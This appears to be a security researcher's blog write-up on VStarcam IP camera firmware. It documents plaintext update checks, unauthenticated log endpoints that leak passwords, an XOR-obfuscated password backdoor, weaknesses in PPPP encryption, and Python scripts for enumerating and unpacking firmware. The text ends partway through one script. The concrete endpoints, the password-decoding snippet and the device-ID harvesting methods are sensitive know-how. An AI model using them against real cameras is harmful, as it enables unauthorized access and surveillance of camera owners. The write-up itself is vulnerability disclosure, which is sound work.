Both requests are performed over plain HTTP, and this is already the first issue. If an attacker can produce a manipulated response on the network that either the app or the device is connected to, they will be able to install a malicious update on the camera. The former is particularly problematic, as the camera owner may connect to an open WiFi or similarly untrusted network while out.
The last part of a firmware version is a build number which is ignored for the update requests. The first part is a vendor ID where only a few options seem relevant (I checked 10, 48 and 66). The rest of the version number can be easily enumerated. Many firmware branches don't have an active update, and when they do, some updates won't download because the servers in question no longer appear to be operational. Still, I found 380 updates this way.
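For illustration, the enumeration can be sketched roughly like this (the URL pattern and vendor IDs are the ones mentioned above; the ranges for the middle version parts and the placeholder build number are assumptions on my part, and the response parsing is left out):
#!/usr/bin/env python3
# Rough sketch of enumerating firmware branches via the update check endpoint.
import urllib.request

VENDOR_IDS = (10, 48, 66)

def check_update(version):
    url = f"http://api4.eye4.cn:808/firmware/{version}/EN"
    try:
        with urllib.request.urlopen(url, timeout=10) as response:
            return response.read() or None
    except OSError:
        return None

for vendor in VENDOR_IDS:
    for second in range(256):      # assumed range
        for third in range(256):   # assumed range
            # The build number is ignored by the update check, so 0 will do.
            version = f"{vendor}.{second}.{third}.0"
            info = check_update(version)
            if info:
                print(version, info[:80])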
I managed to unpack all but one of these updates. Firmware version 10.1.110.2 wasn’t for a camera but rather some device with an HDMI connector and without any P2P functionality – probably a Network Video Recorder (NVR). Firmware version 10.121.160.42 wasn’t using PPPP but something called NHEP2P and an entirely different application-level protocol. Ten updates weren’t updating the camera application but only the base system. This left 367 firmware versions for this investigation.
I do not own any VStarcam hardware, nor would it be feasible to investigate hundreds of different firmware versions with real hardware. The results of this article are based solely on reverse engineering, emulation, and automated analysis via running Ghidra in headless mode. While I can easily emulate a PPPP server, doing the same for the VStarcam cloud infrastructure isn't possible: I simply don't know how it behaves. Similarly, the firmware's interaction with hardware had to be left out of the emulation. While I'm still quite confident in my results, these limitations could introduce errors.
More importantly, there are only so many firmware versions that I checked manually. Most of them were checked automatically, and I typically only looked at a few lines of decompiled code that my scripts extracted. There is potential for false negatives here; I expect that there are more issues with VStarcam firmware than what's listed here.
When an app communicates with a camera, it sends commands like GET /check_user.cgi?loginuse=admin&loginpas=888888&user=admin&pwd=888888. Despite the looks of it, these aren't HTTP requests passed on to a web server. Instead, the firmware handles these in the function P2pCgiParamFunction, which doesn't even attempt to parse the request. The processing code looks for substrings like check_user.cgi to identify the command (yes, you'd better not set check_user.cgi as your access password). Parameter extraction works via similar substring matching.
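To make it clearer what that means, here is a Python paraphrase of the approach described above (not VStarcam's actual code, just the same substring-based dispatch and parameter extraction):
# Illustration only: the same kind of substring matching, reimplemented in Python.
def get_param(request, name):
    # Find "name=" anywhere in the string and read until the next "&".
    start = request.find(name + "=")
    if start < 0:
        return ""
    start += len(name) + 1
    end = request.find("&", start)
    return request[start:] if end < 0 else request[start:end]

def dispatch(request):
    # Whichever endpoint name appears anywhere in the request "wins";
    # the request line is never actually parsed.
    if "check_user.cgi" in request:
        user = get_param(request, "loginuse")
        password = get_param(request, "loginpas")
        return f"checking credentials for {user!r}/{password!r}"
    return "result=-1;"

print(dispatch("GET /check_user.cgi?loginuse=admin&loginpas=888888&user=admin&pwd=888888"))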
It’s worth noting that these cameras have a very peculiar authentication system which VStarcam calls “dual authentication.” Here is how the Eye4 application describes it:
The dual authentication mechanism is a measure to upgrade the whole system security
- The device will double check the identity of the visitor and does not support the old version of app.
- Considering the security risk of possible leakage, the plaintext password mode of the device was turned off and ciphertext access was used.
- After the device is added for the first time, it will not be allowed to be added for a second time, and it will be shared by the person who has added it.
I’m not saying that this description is utter bullshit but there is a considerable mismatch with the reality that I can observe. The VStarcam firmware cannot accept anything other than plaintext passwords. Newer firmware versions employ obfuscation on the PPPP-level but this hardly deserves the name “ciphertext”.
What I can see is: once a device is enrolled into dual authentication, the authentication is handled by function GetUserPri_doubleVerify rather than GetUserPri. There isn’t a big difference between the two, both will try the credentials from the loginuse/loginpas parameters and fall back to the user/pwd credentials pair. Function GetUserPri_doubleVerify merely checks a different password.
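In Python terms, the described logic boils down to something like this (again a paraphrase of the decompiled code, not the firmware's actual source; username handling is glossed over):
def authenticate(params, stored_password):
    # Try the loginuse/loginpas pair first, then fall back to user/pwd.
    for password_key in ("loginpas", "pwd"):
        if params.get(password_key) == stored_password:
            return True
    return False

# GetUserPri compares against the regular password (default 888888), while
# GetUserPri_doubleVerify compares against the dual authentication password.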
From the applications I get the impression that the dual authentication password is automatically generated and probably not even shared with the user but stored in their cloud account. This is an improvement over the regular password that defaults to 888888 and allowed these cameras to be enrolled into a botnet. But it’s still a plaintext password used for authentication.
There is a second aspect to dual authentication. When dual authentication is used, the app is supposed to make a second authentication call to eye4_authentication.cgi. The loginAccount and loginToken parameters here appear to belong to the user’s cloud account, apparently meant to make sure that only the right user can access a device.
Yet in many firmware versions I’ve seen the eye4_authentication.cgi request always succeeds. The function meant to perform a web request is simply hardcoded to return the success code 200. Other firmware versions actually make a request to https://verification.eye4.cn, yet this server also seems to produce a 200 response regardless of what parameters I try. It seems that VStarcam never made this feature work the way they intended it.
None of this stopped VStarcam from boasting on their website merely a year ago:
You can certainly count on anything saying “financial grade encryption” being bullshit. I have no idea where AES comes into the picture here, I haven’t seen it being used anywhere. Maybe it’s their way of saying “we use TLS when connecting to our cloud infrastructure.”
A reasonable approach to authentication is: authentication is required before any requests unrelated to authentication can be made. This is not the approach taken by VStarcam firmware. Instead, some firmware versions decide for each endpoint individually whether authentication is necessary. Other versions put a bunch of endpoints outside of the code enforcing authentication.
The calls explicitly excluded from authentication differ by firmware version but are for example: get_online_log.cgi, show_prodhwfg.cgi, ircut_test.cgi, clear_log.cgi, alexa_ctrl.cgi, server_auth.cgi. For most of these it isn’t obvious why they should be accessible to unauthenticated users. But get_online_log.cgi caught my attention in particular.
So a request like GET /get_online_log.cgi?enable=1 can be sent to a camera without any authentication. This isn't a request that any of the VStarcam apps seem to support, so what does it do?
Despite the name, this isn't a download request; rather, it sets a flag for the current connection. The logic behind this involves many moving parts including a Linux kernel module, but the essence is this: whenever the application logs something via the LogSystem_WriteLog function, the application won't merely print that to stderr and write it to the log file on the SD card but also send it to any connection that has this flag set.
What does the application log? Lots and lots of stuff. On average, VStarcam firmware has around 1500 such logging calls. For example, it could log security tokens:
LogSystem_WriteLog("qiniu.c", "upload_qiniu", 497, 0,
"upload_qiniu*** filename = %s, fileid = %s, uptoken = %s\n", …);
LogSystem_WriteLog("pushservice.c", "parsePushServerRequest_cjson", 5281, 1,
"address=%s token =%s master= %d timestamp = %d", …);
LogSystem_WriteLog("queue.c", "CloudUp_Manage_Pth", 347, 2,
"token=%s", …);
It could log cloud server responses:
LogSystem_WriteLog("pushservice.c", "curlPostMqttAuthCb", 4407, 3,
"\n\nrspBuf = %s\n", …);
LogSystem_WriteLog("post/postFileToCloud.c", "curl_post_file_cb", 74, 0,
"\n\nrspBuf = %s\n", …);
LogSystem_WriteLog("pushserver.c", "curl_Eye4Authentication_write_data_cb", 2822, 0,
"rspBuf = %s", …);
And of course it will log the requests coming in via PPPP:
LogSystem_WriteLog("vstcp2pcmd.c", "P2pCgiParamFunction", 633, 0,
"sit %d, pcmd: %s", …);
Reminder: these requests contain the authentication password as a parameter. So an attacker can connect to a vulnerable device, request logs and wait for the legitimate device owner to connect. Once they do, their password will show up in the logs – voila, the attacker has access now.
VStarcam appears to be at least somewhat aware of this issue because some firmware versions contain code “censoring” password parameters prior to logging:
memcpy(pcmd, request, sizeof(pcmd));
char* pos = strstr(pcmd, "loginuse");
if (pos)
*pos = 0;
LogSystem_WriteLog("vstcp2pcmd.c", "P2pCgiParamFunction", 633, 0,
"sit %d, pcmd: %s", sit, pcmd);
But that’s only the beginning of the story of course.
In addition to the logging calls where the password leaks as a (possibly unintended) side-effect, some logging calls are specifically designed to write the device password to the log. For example, the function GetUserPri meant to handle authentication when dual authentication isn’t enabled will often do something like this on a failed login attempt:
LogSystem_WriteLog("sysparamapp.c", "GetUserPri", 177, 0,
"loginuse=%s&loginpas=%s&user=admin&pwd=888888&", gUser, gPassword);
These aren’t the parameters of a received login attempt but rather what the parameters should look like for the request to succeed. And if the attacker enabled log access for their connection they will get the device credentials handed on a silver platter – without even having to wait for the device owner to connect.
If dual authentication is enabled, function GetUserPri_doubleVerify often contains a similar call:
LogSystem_WriteLog("web.c", "GetUserPri_doubleVerify", 536, 0,
"pri[%d] system OwnerPwd[%s] app Pwd[%s]",
pri, gOwnerPassword, gAppPassword);
What got me confused at first were the firmware versions that would log the “correct” password on failed authentication attempts but lacked the capability for unauthenticated log access. When I looked closer I found the function DoSendLogToNodeServer. The firmware receives a “node configuration” from a server which includes a “push IP” and the corresponding port number. It then opens a persistent TCP connection to that address (unencrypted of course), so that DoSendLogToNodeServer can send messages to it.
Despite the name this function doesn't upload all of the application logs. There are only three to four DoSendLogToNodeServer calls in the firmware versions I looked at, and two are invariably found in function P2pCgiParamFunction, in code running on the first failed authentication attempt:
sprintf(buffer,"password error [doublePwd][%s], [PassWd][%s]", gOwnerPassword, gPassword);
DoSendLogToNodeServer(request);
DoSendLogToNodeServer(buffer);
This is sending both the failed authentication request and the correct passwords to a VStarcam server. So while the password isn’t being leaked here to everybody who knows how to ask, it’s still being leaked to VStarcam themselves. And anybody who is eavesdropping on the device’s traffic of course.
A few firmware versions have log upload functionality in a function called startUploadLogToServer; here all logging output really is uploaded to the server. This isn't called unconditionally, however, but rather enabled by the setLogUploadEnable.cgi endpoint. An endpoint which, you guessed it, can be accessed without authentication. But at least these firmware versions don't seem to have any explicit password logging, only the “regular” logging of requests.
With some considerable effort all of the above could be explained as debugging functionality which was mistakenly shipped to production. VStarcam wouldn't be the first company to fail to realize that functionality labeled “for debugging purposes only” will still be abused if released with the production build of their software. But I found yet another password leak which can only be described as a backdoor.
At some point VStarcam introduced a second version of their get_online_log.cgi API. When that second version is requested the device will respond with something like:
result=0;
index=12345678;
str=abababababab;
The result=0 part is typical and indicates that authentication (or lack thereof in this case) was successful. The other two values are unusual, and eventually I decided to check what they were about. As it turned out, str is a hex-encoded version of the device password after it was XOR'ed with a random byte. And index is an obfuscated representation of that byte.
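Recovering the password from such a response doesn't even require understanding how the index value encodes the XOR byte; there are only 256 candidates to try. A quick sketch (the example value is the placeholder from above, and the printable-ASCII filter is merely a heuristic):
def decode_candidates(leaked_str):
    data = bytes.fromhex(leaked_str)
    for key in range(256):
        candidate = bytes(b ^ key for b in data)
        # Keep only candidates that look like a printable password.
        if all(0x20 <= b < 0x7f for b in candidate):
            yield key, candidate.decode()

for key, password in decode_candidates("abababababab"):
    print(f"XOR byte {key:#04x}: {password}")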
I can only explain it like this: somebody at VStarcam thought that leaking passwords via log output was too obvious, people might notice. So they decided to expose the device password in a more subtle way, one that only they knew how to decode (unless somebody notices this functionality and spends two minutes studying it in the firmware).
Mind you, even though this is clearly a backdoor I’m still not ruling out incompetence. Maybe VStarcam made a large enough mess with their dual authentication that their customer support needs to recover device access on a regular basis. However, they do have device reset functionality that should normally be used for this scenario.
In the end, for their customers it doesn’t matter what the intention was. The result is a device that cannot be trusted with protecting access. For a security camera this is an unforgivable flaw.
Now we are coming to the tough questions. Why do some firmware versions have this backdoor functionality while others don’t? When was this introduced? In what order? What is the current state of affairs?
You might think that after compiling the data on 367 firmware versions the answers would be obvious. But the data is so inconsistent that any conclusions are really difficult. Thing is, we aren’t dealing with a single evolving codebase here. We aren’t even dealing with two codebases or a dozen of them. 367 firmware versions are 367 different codebases. These codebases are related, they share some code here and there, but they are all being developed independently.
I’ve seen this development model before. What VStarcam appears to be doing is: for every new camera model they take some existing firmware and fork it. They adjust that firmware for the new hardware, they probably add new features as well. None of this work makes it into the original firmware unless it is explicitly backported. And since VStarcam is maintaining hundreds of firmware variants, the older ones are usually only receiving maintenance changes if any at all.
To make this mess complete, VStarcam’s firmware version numbers don’t make any sense at all. And I don’t mean the fact that VStarcam releases the same camera under 30 different model names, so there is no chance of figuring out the model to firmware version mapping. It’s also the firmware version numbers themselves.
As I’ve already mentioned, the last part of the firmware version is the build number, increased with each release. The first part is the vendor ID: firmware versions starting with 48 are VStarcam’s global releases whereas 66 is reserved for their Russian distributor (or rather was I think). Current VStarcam firmware is usually released with vendor ID 10 however, standing for… who knows, VeePai maybe? This leaves the two version parts in between, and I couldn’t find any logic here whatsoever. Like, firmware versions sharing the third part of the version number would sometimes be closely related, but only sometimes. At the same time the second part of the version number is supposed to represent the camera model, but that’s clearly not always correct either.
I ended up extracting all the logging calls from all the firmware versions and using that data to calculate a distance between every firmware version pair. I then fed this data into GraphViz and asked it to arrange the graph for me. It gave me the VStarcam spiral galaxy:
Click the image above to see the larger and slightly interactive version (it shows additional information when the mouse pointer is over a graph node). The green nodes are the ones that don't allow access to device logs. Yellow are the ones providing unauthenticated log access, always logging incoming requests including their password parameters. The orange ones have additional logging that exposes the correct password on failed authentication attempts – or they call the DoSendLogToNodeServer function to send the correct password to a VStarcam server. The red ones have the backdoor in the get_online_log.cgi API leaking passwords. Finally, pink are the ones which pretend to improve things by censoring parameters of logged requests – yet all of these without exception leak the password via the backdoor in the get_online_log.cgi API.
Note: Firmware version 10.165.19.37 isn’t present in the graph because it is somehow based on an entirely different codebase with no relation to the others. It would be red in the graph however, as the backdoor has been implemented here as well.
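As for how a map like this can be computed: a minimal sketch, assuming Jaccard distance over the sets of extracted logging strings (the actual metric might differ), with the result written out as GraphViz input:
# A minimal sketch: pairwise Jaccard distance between firmware versions,
# based on the sets of logging call strings extracted from each of them,
# emitted as a GraphViz graph with edges between similar versions.
from itertools import combinations

def jaccard_distance(a, b):
    union = a | b
    if not union:
        return 0.0
    return 1.0 - len(a & b) / len(union)

def write_dot(logs_by_version, threshold=0.5):
    lines = ["graph firmware {"]
    for (v1, s1), (v2, s2) in combinations(logs_by_version.items(), 2):
        distance = jaccard_distance(s1, s2)
        if distance < threshold:  # only connect sufficiently similar versions
            lines.append(f'  "{v1}" -- "{v2}" [len={distance:.2f}];')
    lines.append("}")
    return "\n".join(lines)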
Not only does this graph show the firmware versions as clusters, it’s also possible to approximately identify the direction of time for each cluster. Let’s add cluster names and time arrows to the image:
Of course this isn't a perfect representation of the original data, and I wasn't sure whether it could be trusted. Are these clusters real or merely an artifact produced by the graph algorithm? I verified things manually and could confirm that the clusters are in fact distinctly different on the technical level, particularly when considering update formats:
With the firmware versions ordered like this I could finally make some conclusions about the introduction of the problematic features:
- The get_online_log.cgi API was introduced in cluster B around 2022.
- One of the clusters introduced the DoSendLogToNodeServer function, sending the correct password to a VStarcam server on the first failed login attempt.
- In cluster E, firmware versions with the get_online_log.cgi backdoor start popping up, and these have all other password leaks removed. These even censor passwords in logged request parameters. Either there were security considerations at play or the other ways to expose the password were considered unnecessary at this point and too obvious.
- Cluster F also has the get_online_log.cgi backdoor; it was introduced here around 2024. Unlike with cluster E this backdoor didn't replace the existing password leaks here but only complemented them. In fact, while cluster F was initially “censoring” parameters so that logged requests wouldn't leak passwords, this measure appears to have been dropped later in 2024. Current cluster F firmware tends to have all the issues described in this post simultaneously. Whatever security considerations may have driven the changes in cluster E, the people in charge of cluster F clearly disagreed.

So, how bad is it? Knowing the access password allows access to the camera's main functionality: audio and video recordings. But these cameras have been known for vulnerabilities allowing execution of arbitrary commands. Also, newer cameras have an API that will start a telnet server with hardcoded and widely known administrator credentials (older cameras had this telnet server start by default). So we have to assume that a compromised camera could become part of a botnet or be used as a starting point for attacks against a network.
But this requires accessing the camera first, and most VStarcam cameras won’t be exposed to the internet directly. They will only be reachable via the PPPP protocol. And for that the attackers would need to know the device ID. How would they get it?
There are a number of ways, most of which I've already discussed before. For example, anybody who was briefly connected to your network could have collected the device IDs of your cameras. The script to do that won't currently work with newer VStarcam cameras because these obfuscate the traffic on the PPPP level, but the necessary adjustments aren't exactly complicated.
PPPP networks still support “supernodes,” devices that help route traffic. Back in 2019 Paul Marrapese abused that functionality to register a rogue supernode and collect device IDs en masse. There is no indication that this trick stopped working, and the VStarcam networks are likely susceptible as well.
Users also tend to leak their device IDs themselves. They will post screenshots or videos of the app's user interface. At first glance this is less problematic with the O-KAM Pro app because this one will display only a vendor-specific device ID (it looks similar to a PPPP device ID but has seven digits and only four letters in the verification code). That is, until you notice that the app uses a public web API to translate vendor-specific device IDs into PPPP device IDs.
Anybody who can intercept some PPPP traffic can extract the device IDs from it. Even when VStarcam networks obfuscate the traffic rather than using plaintext transmission, the static keys are well known, and removing the obfuscation isn't hard.
And finally, simply guessing device IDs is still possible. With only 5 million possible verification codes for each device ID and servers not implementing rate limiting, brute-force attacks are quite realistic.
Let’s not forget the elephant in the room however: VStarcam themselves know all the device IDs of course. Not just that, they know which devices are active and where. With a password they can access the cameras of interest to them (or their government) anytime.
Given the intentional nature of these issues, I was unsure how to deal with this. I mean, what’s the point of reporting vulnerabilities to VStarcam that they are clearly aware of? In the end I decided to give them a chance to address the issues before they become public knowledge.
When I went looking for a way to report this, however, all I found was VStarcam boasting about their ISO 27001:2022 compliance. My understanding is that this requires them to have a dedicated person responsible for vulnerability management, but they are not obliged to list any security contact that can be reached from outside the company – and so they don't. I ended up emailing all company addresses I could find, asking whether there is any way to report security issues to them.
I haven't received any response, an experience that, from what I understand, other people have already had with VStarcam. So I went with my initial publication schedule rather than waiting 90 days as I would normally do.
Whatever motives VStarcam had to backdoor their cameras, the consequence for the customers is: these cameras cannot be trusted. Their access protection should be considered compromised. Even with firmware versions shown as green on my map, there is no guarantee that I haven’t missed something or that these will still be green after the next update.
If you want to keep using a VStarcam camera, the only safe way to do it is disconnecting it from the internet. They don’t have to be disconnected physically, internet routers will often have a way to prohibit internet traffic to and from particular devices. My router for example has this feature under parental control.
Of course this will mean that you will only be able to control your camera while connected to the same network. It might be possible to explicitly configure port forwarding for the camera’s RTSP port, allowing you to access at least the video stream from outside. Just make sure that your RTSP password isn’t known to VStarcam.
My first article on the PPPP protocol already said everything there was to say about PPPP “encryption”:
So this thing is completely broken, why look any further? There is at least one situation where you don't know the app being used, so you cannot extract the key, and you don't have any traffic to analyze either. It's when you are trying to scan your local network for potential hidden cameras.
This script will currently only work for cameras using plaintext communication. Other cameras expect a properly encrypted “LAN search” packet and will ignore everything else. How can this be solved without listing all possible keys in the script? By sending all possible ciphertexts of course!
TL;DR: What would be completely ridiculous with any reasonable protocol turned out to be quite possible with PPPP. There are at most 157,092 ways in which a “LAN search” packet can be encrypted. I’ve opened a pull request to have the PPPP device detection script adjusted.
Note: Cryptanalysis isn't my topic; I am by no means an expert here. These issues are simply too obvious.
The key which is specified as part of the app's “init string” is not being used for encryption directly. Nor is it being fed into any of the established key stretching algorithms. Instead, a key represented by the byte sequence b1, b2, …, bn is mapped to four bytes, call them k1 through k4, that become the effective key. Three of them are calculated as follows (⌊x⌋ means rounding down, ⊕ stands for the bitwise XOR operation), while the fourth is derived directly from one of the others:

k1 = (⌊b1/3⌋ + ⌊b2/3⌋ + … + ⌊bn/3⌋) mod 256
k2 = b1 ⊕ b2 ⊕ … ⊕ bn
k3 = (b1 + b2 + … + bn) mod 256

In theory, a 4 byte long effective key means 2^32 possible values. But that would only be the case if these bytes were independent of each other.

Of course the bytes of the effective key are not independent. This is most obvious with k4, which is completely determined by one of the other bytes.

This means that we can ignore k4, bringing the number of possible effective keys down to 2^24.

Now let's have a look at the relationship between k2 and k3. Addition and bitwise XOR operations are very similar; the latter merely ignores carry. This difference affects all the bits of the result but the lowest one, where there is no carry to consider. This means that the lowest bits of k2 and k3 are always identical. So k2 has only 128 possible values for any value of k3, bringing the total number of effective keys down to 2^23.

And that's how far we can get considering only redundancies. It can be shown that a key can be constructed resulting in any combination of k1 and k3 values. Similarly, it can be shown that any combination of k2 and k3 is possible as long as the lowest bit is identical.

But the keys we are dealing with here aren't arbitrary bytes. These aren't limited to alphanumeric characters, some keys also contain punctuation, but they are all invariably limited to the ASCII range. And that means that the highest bit is never set in any of the bi values.

Which in turn means that the highest bit is never set in k2 due to the nature of the bitwise XOR operation. We can once again rule out half of the effective keys: for any given value of k3 there are only 64 possible values of k2. We now have 2^22 possible effective keys.

Now let's have a thorough look at how k1 relates to k3, ignoring the modulo operation at first. We are taking one third of each byte, rounding it down and summing that up. What if we were to sum up first and round down at the end, how would that relate? Well, it definitely cannot be smaller than rounding down in each step, so we have an upper bound here:

⌊b1/3⌋ + ⌊b2/3⌋ + … + ⌊bn/3⌋ ≤ ⌊(b1 + b2 + … + bn)/3⌋

How much smaller can the left side get? Each time we round down this removes at most two thirds, and we do this n times. So altogether these rounding operations reduce the result by at most 2n/3. This gives us a lower bound:

⌊b1/3⌋ + ⌊b2/3⌋ + … + ⌊bn/3⌋ ≥ (b1 + b2 + … + bn)/3 - 2n/3

If n is arbitrary these bounds don't help us at all. But n isn't arbitrary: the keys used for PPPP encryption tend to be fairly short. Let's say that we are dealing with keys of length 16 at most, which is a safe bet. If we know the sum of the bytes these bounds allow us to narrow k1 down to 11 possible values.

But we don't know the sum of bytes. What we have is k3 which is that sum modulo 256, and the sum is actually k3 + 256·m where m is some nonnegative integer. How large can m get? Remembering that we are dealing with ASCII keys, each byte has at most the value 127. And we have at most 16 bytes. So the sum of bytes cannot be higher than 127 · 16 = 2032 (or 7F0 in hexadecimal). Consequently, m is 7 at most.

Let's write down the bounds for k1 now, with k1 being the middle sum taken modulo 256:

(k3 + 256·m)/3 - 2n/3 ≤ ⌊b1/3⌋ + ⌊b2/3⌋ + … + ⌊bn/3⌋ ≤ ⌊(k3 + 256·m)/3⌋

We have to consider this for eight possible values of m. Wait, do we really?

Once we move into modulo 256 space again, the 256·m/3 part of our bounds (which is the only part dependent on m) will assume the same value after every three values of m. So only three values of m are really relevant, say 0, 1 and 2. Meaning that for each value of k3 we have 3 · 11 = 33 possible values for k1.

This gives us 256 · 64 · 33 = 540,672 as the number of possible effective keys. My experiments with random keys indicate that this should be pretty much as far down as it goes. There may still be more edge conditions rendering some effective keys impossible, but if these exist their impact is insignificant.
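To double-check the arithmetic (under the same assumptions as above: ASCII keys of at most 16 bytes):
max_sum = 127 * 16                    # 2032 == 0x7F0, so the multiple of 256 is at most 7
values_per_sum = 2 * 16 // 3 + 1      # the bounds span roughly 2n/3, i.e. 11 possible values
print(hex(max_sum))                   # 0x7f0
print(values_per_sum)                 # 11
print(3 * values_per_sum)             # 33 values once the unknown multiple of 256 is folded in
print(256 * 64 * 3 * values_per_sum)  # 540672 possible effective keys
print(64 * 3 * values_per_sum)        # 2112 keys remaining once the sum byte is known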
Not all effective keys are equally likely, however: the values at the outer edges of the possible range are very unlikely. So one could prioritize the keys by probability – if the total number weren't already low enough to render this exercise moot.
We have the four byte plaintext F1 30 00 00 and we have 540,672 possible effective keys. How many ciphertexts does this translate to? With any reasonable encryption scheme the answer would be: slightly less than 540,672 due to a few unlikely collisions which could occur here.
But PPPP doesn't use a reasonable encryption scheme. With merely four bytes of plaintext there is a significant chance that PPPP will only use part of the effective key for encryption, resulting in identical ciphertexts for every key sharing that part. I didn't bother analyzing this possibility mathematically; my script simply generated all possible ciphertexts. So the exact answer is: 540,672 effective keys produce 157,092 ciphertexts.
And that’s why you should leave cryptography to experts.
Now let’s say we send 157,092 encrypted requests. An encrypted response comes back. How do we decrypt it without knowing which of the requests was accepted?
All PPPP packets start with the magic byte F1, so the first byte of our response's plaintext must be F1 as well. The “encryption” scheme used by PPPP allows translating that knowledge directly into the value of one effective key byte. Now one could probably (definitely) guess more plaintext parts and with some clever tricks deduce the rest of the effective key. But there are only 64 · 33 = 2,112 possible effective keys for each value of that byte anyway. It's much easier to simply try out all 2,112 possibilities and see which one results in a response that makes sense.
The response here is 24 bytes large, making ambiguous decryptions less likely. Still, my experiments show that in approximately 4% of the cases closely related keys will produce valid but different decryption results. So you will get two or more similar device IDs and any one of them could be correct. I don’t think that this ambiguity can be resolved without further communication with the device, but at least with my changes the script reliably detects when a PPPP device is present on the network.
One important player in the PPPP protocol business is VStarcam. At the very least they’ve already accumulated an impressive portfolio of security issues. Like exposing system configuration including access password unprotected in the Web UI (discovered by multiple people independently from the look of it). Or the open telnet port accepting hardcoded credentials (definitely discovered by lots of people independently). In fact, these cameras have been seen used as part of a botnet, likely thanks to some documented vulnerabilities in their user interface.
Is that a thing of the past? Are there updates fixing these issues? Which devices can be updated? These questions are surprisingly hard to answer. I found zero information on VStarcam firmware versions, available updates or security fixes. In fact, it doesn’t look like they ever even acknowledged learning about the existence of these vulnerabilities.
No way around downloading these firmware updates and having a look for myself. With surprising results. First of all: there are lots of firmware updates. It seems that VStarcam accumulated a huge number of firmware branches. And even though not all of them have an active or downloadable update, the number of currently available updates goes into the hundreds.
And the other aspect: the variety of update formats is staggering, and often enough standard tools like binwalk aren’t too useful. It took some time figuring out how to unpack some of the more obscure variants, so I’m documenting it all here.
Warning: Lots of quick-and-dirty Python code ahead. Minimal error checking, use at your own risk!
These incremental updates don’t contain an image of the entire system, only the files that need updating. They always contain the main application however, which is what matters.
Recognizing this format is easy: the files start with the 32 bytes www.object-camera.com.by.hongzx. or www.veepai.com/design.rock-peng. (the old and the new variant respectively). The files end with the same string in reverse order. Everything in between is a sequence of ZIP files, with each file packed in its own ZIP file.
Each ZIP file is preceded by a 140 byte header: 64 byte directory name, 64 byte file name, 4 byte ZIP file size, 4 byte timestamp of some kind and 4 zero bytes. While binwalk can handle this format, having each file extracted into a separate directory structure isn’t optimal. A simple Python script can do better:
#!/usr/bin/env python3
import datetime
import io
import struct
import os
import sys
import zipfile
def unpack_zip_stream(input: io.BytesIO, targetdir: str) -> None:
targetdir = os.path.normpath(targetdir)
while True:
header = input.read(0x8c)
if len(header) < 0x8c:
break
_, _, size, _, _ = struct.unpack('<64s64sLLL', header)
data = input.read(size)
with zipfile.ZipFile(io.BytesIO(data)) as archive:
for member in archive.infolist():
path = os.path.normpath(
os.path.join(targetdir, member.filename)
)
if os.path.commonprefix((path, targetdir)) != targetdir:
raise Exception('Invalid target path', path)
try:
os.makedirs(os.path.dirname(path))
except FileExistsError:
pass
with archive.open(member) as member_input:
data = member_input.read()
with open(path, 'wb') as output:
output.write(data)
time = datetime.datetime(*member.date_time).timestamp()
os.utime(path, (time, time))
if __name__ == '__main__':
if len(sys.argv) != 3:
print(f'Usage: {sys.argv[0]} in-file target-dir', file=sys.stderr)
sys.exit(1)
if os.path.exists(sys.argv[2]):
raise Exception('Target directory exists')
with open(sys.argv[1], 'rb') as input:
header = input.read(32)
if (header != b'www.object-camera.com.by.hongzx.' and
header != b'www.veepai.com/design.rock-peng.'):
raise Exception('Wrong file format')
unpack_zip_stream(input, sys.argv[2])
This format is pretty simple. There is an identical section starting with VSTARCAM_PACK_SYSTEM_HEAD and ending with VSTARCAM_PACK_SYSTEM_TAIL at the start and at the end of the file. This section seems to contain a payload size and its MD5 hash.
There are two types of payload here. One is a raw SquashFS image starting with hsqs. These seem to be updates to the base system: they contain an entire Linux root filesystem and the Web UI root but not the actual application. The matching application lives on a different partition and is likely delivered via incremental updates.
The other variant seems to be used for hardware running LiteOS rather than Linux. The payload here starts with a 16 byte header: compressed size, uncompressed size and an 8 byte identification of the compression algorithm. The latter is usually gziphead, meaning standard gzip compression. After uncompressing you get a single executable binary containing the entire operating system, drivers, and the actual application.
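Unpacking that LiteOS variant doesn't need much beyond gzip. A quick-and-dirty sketch (the little-endian field order and locating the header via its gziphead marker are assumptions on my part):
#!/usr/bin/env python3
import gzip
import struct
import sys

with open(sys.argv[1], 'rb') as f:
    data = f.read()

marker = data.find(b'gziphead')
if marker < 0:
    sys.exit('No gziphead payload found')

# The 8 byte algorithm identifier is preceded by compressed and uncompressed size.
compressed_size, uncompressed_size = struct.unpack('<LL', data[marker - 8:marker])
payload = data[marker + 8:marker + 8 + compressed_size]
out = gzip.decompress(payload)
assert len(out) == uncompressed_size
with open(sys.argv[1] + '.unpacked', 'wb') as f:
    f.write(out)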
So far binwalk can handle all these files just fine. I found exactly one exception, firmware version 48.60.30.22. It seems to be another LiteOS-based update but the compression algorithm field is all zeroes. The actual compressed stream has some distinct features that make it look like none of the common compression algorithms.
Well, I had to move on here, so that’s the one update file I haven’t managed to unpack.
This is a format that seems to be used by newer VStarcam hardware. At offset 8 these files contain a firmware version like www.veepai.com-10.201.120.54. Offsets of the payload vary but it is a SquashFS image, so binwalk can be used to find and unpack it.
Normally these are updates for the partition where the VStarcam application resides. In a few cases they update the Linux base system, however, with no application-specific files from what I could tell.
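If you don't want to involve binwalk, the interesting bits can be located directly. A tiny sketch (assuming the version string is null-terminated; hsqs is the usual SquashFS magic):
#!/usr/bin/env python3
import sys

with open(sys.argv[1], 'rb') as f:
    data = f.read()

# Firmware version string at offset 8, e.g. www.veepai.com-10.201.120.54
version = data[8:data.index(b'\0', 8)]
print('Firmware version:', version.decode(errors='replace'))

# The payload is a SquashFS image; print its offset for extraction.
print('SquashFS image at offset:', data.find(b'hsqs'))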
This format seems to be specific to the Ingenic hardware platform, and I’ve seen other hardware vendors use it as well. One noticeable feature here is the presence of a tag partition containing various data sections, e.g. the CMDL section encoding Linux kernel parameters.
In fact, looking for that tag partition within the update might be helpful to recognize the format. While the update files usually start with the 11 22 33 44 magic bytes, they sometimes start with a different byte combination. There is always the firmware version at offset 8 in the file however.
The total size of the file header is 40 bytes. It is followed by a sequence of partitions, each preceded by a 16 byte header where bytes 1 to 4 encode the partition index and bytes 9 to 12 the partition size.
Binwalk can recognize and extract some partitions but not all of them. If you prefer having all partitions extracted you can use a simple Python script:
#!/usr/bin/env python3
import io
import struct
import os
import sys
def unpack_ingenic_update(input: io.BytesIO, targetdir: str) -> None:
os.makedirs(targetdir)
input.read(40)
while True:
header = input.read(16)
if len(header) < 16:
break
index, _, size, _ = struct.unpack('<LLLL', header)
data = input.read(size)
if len(data) < size:
raise Exception(f'Unexpected end of data')
path = os.path.join(targetdir, f'mtdblock{index}')
